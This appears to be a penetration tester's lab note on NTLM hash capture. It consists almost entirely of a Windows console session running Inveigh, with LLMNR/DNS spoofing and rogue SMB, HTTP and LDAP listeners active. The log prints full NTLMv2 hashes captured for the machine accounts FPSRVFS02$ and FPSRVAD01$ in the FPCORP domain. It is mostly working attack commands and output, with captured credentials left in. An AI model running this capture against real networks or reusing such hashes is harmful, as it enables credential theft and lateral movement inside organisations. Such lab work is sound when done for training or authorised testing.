NTLM Capture

Common tools
Responder

Responder -I tun0

On Windows, use Inveigh.exe

Microsoft Windows [版本 10.0.20348.3807]
(c) Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd C:\Users\Public

C:\Users\Public>Inveigh.exe
[*] Inveigh 2.0.11 [Started 2025-11-09T15:39:51 | PID 6892]
[+] Packet Sniffer Addresses [IP 172.22.20.38 | IPv6 fe80::c9e8:95cd:3cd9:d1c%15]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.22.20.38 | IPv6 fe80::c9e8:95cd:3cd9:d1c%15]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Public]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
System.Net.Sockets.SocketException (0x80004005): 以一种访问权限不允许的方式做了一个访问套接字的尝试。
   在 System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress)
   在 System.Net.Sockets.Socket.Bind(EndPoint localEP)
   在 System.Net.Sockets.TcpListener.Start(Int32 backlog)
   在 Quiddity.HTTPListener.Start(IPAddress ipAddress, Int32 port, String type)
System.Net.Sockets.SocketException (0x80004005): 以一种访问权限不允许的方式做了一个访问套接字的尝试。
   在 System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress)
   在 System.Net.Sockets.Socket.Bind(EndPoint localEP)
   在 System.Net.Sockets.TcpListener.Start(Int32 backlog)
   在 Quiddity.HTTPListener.Start(IPAddress ipAddress, Int32 port, String type)
[.] [15:41:41] TCP(8080) SYN packet from 172.22.20.165:49896
[.] [15:42:11] SMB1(445) negotiation request detected from 172.22.20.38:59125
[.] [15:42:11] SMB2+(445) negotiation request detected from 172.22.20.38:59125
[.] [15:43:41] TCP(8080) SYN packet from 172.22.20.165:49897
[.] [15:45:41] TCP(8080) SYN packet from 172.22.20.165:49899
[.] [15:47:41] TCP(8080) SYN packet from 172.22.20.165:49915
[.] [15:49:41] TCP(8080) SYN packet from 172.22.20.165:49917
[.] [15:51:41] TCP(8080) SYN packet from 172.22.20.165:49918


Invalid Command
============================================================ Inveigh Console Commands ============================================================

Command                           Description
==================================================================================================================================================
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES              | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
GET IGNOREQUERIES               | get IgnoreQueries parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

================================================================= NTLMv2 Hashes ==================================================================

Hashes
==================================================================================================================================================
FPSRVFS02$::FPCORP:1662E59A33BB510E:9A7D26EC54BC407951FF34EF6DCCD937:0101000000000000CEFF3DF35151DC01333835A7A1A241630000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800CEFF3DF35151DC0106000400020000000800300030000000000000000000000000400000BDC9A9BA2FF6BAEF6195197D0A67E20ECECBDD8E7549115A2BE3DFA6ABC335420A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
FPSRVFS02$::FPCORP:5C8CA6C0B09BAD0D:E874F8E9969CC5E7A854DD73583EAE9F:0101000000000000C66347065251DC016C545852B7390FB70000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800C66347065251DC0106000400020000000800300030000000000000000000000000400000BDC9A9BA2FF6BAEF6195197D0A67E20ECECBDD8E7549115A2BE3DFA6ABC335420A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000

C(0:0) NTLMv1(0:0) NTLMv2(2:4)>

[.] [16:19:53] TCP(8080) SYN packet from 172.22.20.165:49961
[.] [16:21:53] TCP(8080) SYN packet from 172.22.20.165:49963
[.] [16:22:13] TCP(445) SYN packet from 172.22.20.32:49760
[.] [16:22:13] SMB1(445) negotiation request detected from 172.22.20.32:49760
[.] [16:22:13] SMB2+(445) negotiation request detected from 172.22.20.32:49760
[+] [16:22:13] SMB(445) NTLM challenge [1662E59A33BB510E] sent to 172.22.20.38:49760
[+] [16:22:13] SMB(445) NTLMv2 captured for [FPCORP\FPSRVFS02$] from 172.22.20.32(FPSRVFS02):49760:
[!] [16:22:13] SMB(445) NTLMv2 for [FPCORP\FPSRVFS02$] written to Inveigh-NTLMv2.txt
[+] [16:22:13] SMB(445) NTLMv2 captured for [FPCORP\FPSRVFS02$] from 172.22.20.32(FPSRVFS02):49760 [not unique]
[.] [16:22:13] TCP(445) SYN packet from 172.22.20.32:49763
[.] [16:22:13] SMB2+(445) negotiation request detected from 172.22.20.32:49763
[+] [16:22:16] SMB(445) NTLM challenge [1081B7E650D40883] sent to 172.22.20.38:49760
[.] [16:22:16] SMB(445) NTLM null response from 172.22.20.32(FPSRVFS02):49760
[+] [16:22:16] SMB(445) NTLM challenge [D5103CDBA11ABAF0] sent to 172.22.20.38:49760
[.] [16:22:16] SMB(445) NTLM null response from 172.22.20.32(FPSRVFS02):49760
[.] [16:22:45] TCP(445) SYN packet from 172.22.20.32:49766
[.] [16:22:45] SMB1(445) negotiation request detected from 172.22.20.32:49766
[.] [16:22:45] SMB2+(445) negotiation request detected from 172.22.20.32:49766
[+] [16:22:45] SMB(445) NTLM challenge [5C8CA6C0B09BAD0D] sent to 172.22.20.38:49766
[+] [16:22:45] SMB(445) NTLMv2 captured for [FPCORP\FPSRVFS02$] from 172.22.20.32(FPSRVFS02):49766 [not unique]
[.] [16:22:45] TCP(445) SYN packet from 172.22.20.32:49769
[.] [16:23:34] TCP(445) SYN packet from 172.22.20.25:50213
[.] [16:23:34] SMB1(445) negotiation request detected from 172.22.20.25:50213
[.] [16:23:34] SMB2+(445) negotiation request detected from 172.22.20.25:50213
[+] [16:23:34] SMB(445) NTLM challenge [F699FBC7F31D85F2] sent to 172.22.20.38:50213
[+] [16:23:34] SMB(445) NTLMv2 captured for [FPCORP\FPSRVAD01$] from 172.22.20.25(FPSRVAD01):50213:
FPSRVAD01$::FPCORP:F699FBC7F31D85F2:42551D1FB9BDFADA2729110BC1B2409C:0101000000000000357BFF235251DC0190CD59EDBDCF04560000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800357BFF235251DC010600040002000000080030003000000000000000000000000040000042BDD4CBE53B9CD00D7CB8D57F1500C7ADA5AB91B79939ADD8D1055FF4E155310A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
[!] [16:23:34] SMB(445) NTLMv2 for [FPCORP\FPSRVAD01$] written to Inveigh-NTLMv2.txt
[.] [16:23:35] TCP(445) SYN packet from 172.22.20.25:50216
[+] [16:23:37] SMB(445) NTLM challenge [E84A312B8C4FF7C9] sent to 172.22.20.38:50213
[.] [16:23:38] SMB(445) NTLM null response from 172.22.20.25(FPSRVAD01):50213
[+] [16:23:38] SMB(445) NTLM challenge [49FE1F2895181439] sent to 172.22.20.38:50213
[.] [16:23:38] SMB(445) NTLM null response from 172.22.20.25(FPSRVAD01):50213
[.] [16:23:53] TCP(8080) SYN packet from 172.22.20.165:49969
[.] [16:25:53] TCP(8080) SYN packet from 172.22.20.165:49973
[.] [16:27:11] SMB1(445) negotiation request detected from 172.22.20.38:59136
[.] [16:27:11] SMB2+(445) negotiation request detected from 172.22.20.38:59136
[.] [16:27:53] TCP(8080) SYN packet from 172.22.20.165:49977

[Screenshot: Pasted image 20251109162918.png]